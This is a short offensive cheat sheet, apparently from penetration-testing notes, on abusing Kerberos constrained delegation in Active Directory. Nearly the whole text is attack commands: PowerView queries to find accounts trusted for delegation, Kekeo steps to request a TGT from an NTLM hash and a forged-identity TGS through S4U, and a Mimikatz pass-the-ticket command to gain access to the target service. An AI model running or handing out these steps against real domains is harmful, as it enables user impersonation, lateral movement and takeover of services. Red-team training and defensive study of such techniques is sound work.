CONSTRAINED DELEGATION
Enumerate users with Constrained Delegation enabled
Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | Select -ExpandProperty samaccountname
Get-DomainUser -TrustedToAuth | Select samaccountname,useraccountcontrol
Using Kekeo to request a TGT for the constrained delegated service
tgt::ask /user:<CONSTRAINED SERVICE> /domain:<DOMAIN> /rc4:<NTLM>
Requesting a TGS for target service from our constrained service ticket
tgs::s4u /tgt:<TGT PATH> /user:<USERNAME> /service:<SPN>
Performing Pass The Ticket attack with mimikatz to gain access
Invoke-Mimikatz -Command '"kerberos::ptt <TGS PATH>"'
Last updated